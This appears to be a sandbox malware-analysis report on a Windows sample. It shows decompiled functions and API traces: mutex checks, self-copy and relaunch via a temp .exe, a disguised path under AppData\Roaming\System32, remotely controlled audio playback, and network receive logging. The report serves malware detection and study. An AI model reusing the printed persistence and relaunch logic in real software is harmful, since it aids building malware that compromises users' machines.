                                        Uniqueness Score: -1.00%

                                        Function 0040A906, Relevance: 77.3, APIs: 39, Strings: 5, Instructions: 271sleepsynchronizationstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateMutexA.KERNEL32(00000000,00000001,0041BA38,0041BCB0,00000000), ref: 0040A91D
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040A930
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040A93D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A946
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 0040A965
                                          • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                          • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                          • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                        • exit.MSVCRT ref: 0040A97F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A98C
                                        • exit.MSVCRT ref: 0040A9A9
                                        • OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 0040A9B8
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040A9C4
                                        • CloseHandle.KERNEL32(80000001), ref: 0040A9CD
                                        • GetCurrentProcessId.KERNEL32 ref: 0040A9D3
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,00000000), ref: 0040A9E1
                                        • PathFileExistsW.SHLWAPI(?), ref: 0040AA00
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AA15
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AA1F
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 0040AA63
                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0040AA7E
                                        • lstrcatW.KERNEL32(?,.exe), ref: 0040AA90
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AAA2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AAAC
                                          • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040AAD2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,80000001), ref: 0040AAE4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524), ref: 0040AAFE
                                        • Sleep.KERNEL32(000001F4), ref: 0040AB15
                                        • exit.MSVCRT ref: 0040AB2A
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                        • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                          • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe), ref: 00407DA4
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 00407DBE
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 00407DC8
                                          • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe), ref: 00407DE8
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 00407E02
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,0041BA28,00415A24), ref: 00407E0C
                                          • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe), ref: 00407E2C
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                        • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$?c_str@?$basic_string@$G@2@@0@V?$basic_string@$G@2@@std@@$?size@?$basic_string@Hstd@@$File$??1?$basic_string@V10@V10@@exit$??8std@@CloseCreateNameOpenPathProcessSleepTemp$??0?$basic_string@??4?$basic_string@CurrentD@1@@ExecuteExistsHandleModuleMutexObjectQueryShellSingleV01@ValueWaitlstrcat
                                        • String ID: .exe$WDH$exepath$open$temp_
                                        • API String ID: 2802067201-3088914985
                                        • Opcode ID: b6e4201a0bc2d300c2b01fb888cc1e4db450f4ca7ef8c4092e0438d00c3ee3fc
                                        • Instruction ID: 71612b700bd92f7f916ca3283b0c55b6d5dde9a5cbb5d2c431e2c067e6a7b7c7
                                        • Opcode Fuzzy Hash: b6e4201a0bc2d300c2b01fb888cc1e4db450f4ca7ef8c4092e0438d00c3ee3fc
                                        • Instruction Fuzzy Hash: E5919772640608BBDB115BA0DC49FEF376DEB88341F10407AFA06E61D1DBB84995CBAD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00411D8A, Relevance: 77.2, APIs: 34, Strings: 10, Instructions: 210synchronizationCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 25%
                                        			E00411D8A(WCHAR* __eax, char _a4, intOrPtr _a20, intOrPtr _a24, char _a27) {
				char _v20;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				char _v88;
				char* _t35;
				char* _t36;
				char* _t37;
				WCHAR* _t38;
				void* _t43;
				void* _t47;
				intOrPtr* _t50;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr* _t88;
				void* _t91;

				_t30 = __eax;
				__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z(0x5c, 0);
				if(__eax ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t30 = E004135DE();
					_t91 = _t91 + 0xc;
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t30,  &_v36, 0x30, __eax);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				if(_t30 <= 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					if(PathFileExistsW(_t30) != 0) {
						goto L4;
					} else {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
						_t47 = E004020C2(0x41c178, 0xa8, 0x415664);
					}
				} else {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_a24, _t30);
					E00412E4E(_t30);
					_t91 = _t91 - 0x10 + 0x14;
					L4:
					_t35 =  &_v68;
					L0041416A();
					_t36 =  &_v52;
					L00414146();
					_t37 =  &_v36;
					L0041414C();
					_t38 =  &_v20;
					L00414146();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t38, _t37, _t37, _t36, _t36, _t35, _t35, L"open \"",  &_a4, L"\" type ", E00412795( &_v84, _a20), L" alias audio");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					mciSendStringW(_t38, 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					E004020C2(0x41c178, 0xa9, 0x415664);
					_t43 = CreateEventA(0, 1, 0, 0);
					 *0x41c1d4 = _t43;
					if(_t43 != 0) {
						do {
							if( *0x41c1d2 != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x41c1d2 = 0;
							}
							if( *0x41c1d3 != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x41c1d3 = 0;
							}
							mciSendStringA("status audio mode",  &_v88, 0x14, 0);
							_t50 = "stopped";
							_t88 =  &_v88;
							while(1) {
								_t86 =  *_t88;
								_t78 = _t86;
								if(_t86 !=  *_t50) {
									break;
								}
								if(_t78 == 0) {
									L14:
									_t50 = 0;
								} else {
									_t87 =  *((intOrPtr*)(_t88 + 1));
									_t79 = _t87;
									if(_t87 !=  *((intOrPtr*)(_t50 + 1))) {
										break;
									} else {
										_t88 = _t88 + 2;
										_t50 = _t50 + 2;
										if(_t79 != 0) {
											continue;
										} else {
											goto L14;
										}
									}
								}
								goto L18;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							L18:
							if(_t50 == 0) {
								SetEvent( *0x41c1d4);
							}
							if(WaitForSingleObject( *0x41c1d4, 0x1f4) == 0) {
								CloseHandle( *0x41c1d4);
								 *0x41c1d4 = 0;
							}
						} while ( *0x41c1d4 != 0);
					}
					mciSendStringA("stop audio", 0, 0, 0);
					mciSendStringA("close audio", 0, 0, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					_t47 = E004020C2(0x41c178, 0xaa, 0x415664);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t47;
			}






















                                        0x00411d8a
                                        0x00411d9b
                                        0x00411da9
                                        0x00411dae
                                        0x00411dbb
                                        0x00411dc0
                                        0x00411dc7
                                        0x00411dd0
                                        0x00411dd0
                                        0x00411dd9
                                        0x00411de4
                                        0x00411f46
                                        0x00411f55
                                        0x00000000
                                        0x00411f5b
                                        0x00411f69
                                        0x00411f79
                                        0x00411f79
                                        0x00411dea
                                        0x00411dea
                                        0x00411df9
                                        0x00411dff
                                        0x00411e04
                                        0x00411e07
                                        0x00411e24
                                        0x00411e2d
                                        0x00411e36
                                        0x00411e3a
                                        0x00411e43
                                        0x00411e47
                                        0x00411e50
                                        0x00411e54
                                        0x00411e5f
                                        0x00411e68
                                        0x00411e71
                                        0x00411e7a
                                        0x00411e86
                                        0x00411e8d
                                        0x00411ea1
                                        0x00411eb1
                                        0x00411ec1
                                        0x00411ecb
                                        0x00411ed3
                                        0x00411ed8
                                        0x00411ede
                                        0x00411ee4
                                        0x00411eee
                                        0x00411ef0
                                        0x00411ef0
                                        0x00411efc
                                        0x00411f06
                                        0x00411f08
                                        0x00411f08
                                        0x00411f1a
                                        0x00411f1c
                                        0x00411f21
                                        0x00411f24
                                        0x00411f24
                                        0x00411f26
                                        0x00411f2a
                                        0x00000000
                                        0x00000000
                                        0x00411f2e
                                        0x00411f42
                                        0x00411f42
                                        0x00411f30
                                        0x00411f30
                                        0x00411f33
                                        0x00411f38
                                        0x00000000
                                        0x00411f3a
                                        0x00411f3b
                                        0x00411f3d
                                        0x00411f40
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00411f40
                                        0x00411f38
                                        0x00000000
                                        0x00411f2e
                                        0x00411f83
                                        0x00411f85
                                        0x00411f88
                                        0x00411f8a
                                        0x00411f92
                                        0x00411f92
                                        0x00411fab
                                        0x00411fb3
                                        0x00411fb9
                                        0x00411fb9
                                        0x00411fbf
                                        0x00411ede
                                        0x00411fd3
                                        0x00411fdd
                                        0x00411fed
                                        0x00411ffd
                                        0x00412005
                                        0x00412005
                                        0x0041200e
                                        0x00412018

                                        APIs
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,00000000,?,0041B310), ref: 00411D9B
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DAE
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0041B310), ref: 00411DC7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0041B310), ref: 00411DD0
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0041B310), ref: 00411DD9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DEA
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411DF9
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,open ",?," type ,00000000, alias audio,?,0041B310), ref: 00411E2D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,0041B310), ref: 00411E3A
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310), ref: 00411E47
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310), ref: 00411E54
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E5F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E68
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E71
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E7A
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E86
                                        • mciSendStringW.WINMM(00000000), ref: 00411E8D
                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00411EA1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411EB1
                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9), ref: 00411ECB
                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00411EEE
                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00411F06
                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00411F1A
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411F46
                                        • PathFileExistsW.SHLWAPI(00000000,?,0041B310), ref: 00411F4D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411F69
                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411F92
                                        • WaitForSingleObject.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FA3
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FB3
                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00411FD3
                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00411FDD
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411FED
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(000000AA), ref: 00412005
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041200E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@SendString$??0?$basic_string@D@2@@std@@D@std@@$?c_str@?$basic_string@G@2@@0@Hstd@@V?$basic_string@$D@1@@$EventV01@@V10@$??4?$basic_string@?find@?$basic_string@?length@?$basic_string@CloseCreateExistsFileG@1@@HandleObjectPathSingleV01@V10@0@V10@@Wait
                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                        • API String ID: 1753768752-1354618412
                                        • Opcode ID: 9b6a564b4307e82e3d21cd783dbd3716fbb2968f83690b74f9bece41395da60c
                                        • Instruction ID: 390487820da651bbbca776db698e462f264097bfb23042b57de684319bca0ea3
                                        • Opcode Fuzzy Hash: 9b6a564b4307e82e3d21cd783dbd3716fbb2968f83690b74f9bece41395da60c
                                        • Instruction Fuzzy Hash: E1618271A9061CFFDB00AFA0DC89DFF3B6DEB54344B448026F902971A1DB799D848B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403473, Relevance: 72.0, APIs: 36, Strings: 5, Instructions: 228networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                        • recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                        • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                        • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035BB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,nTotBytesRecv: ,00000000,?,?,?,?), ref: 004035CD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004035DE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,FileSize: ,00000000,?,?,?,?), ref: 004035FB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,FileSize: ,00000000,?,?,?,?), ref: 00403608
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403619
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040362A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403633
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004036F3
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,0000FDE8,00000000), ref: 004036FE
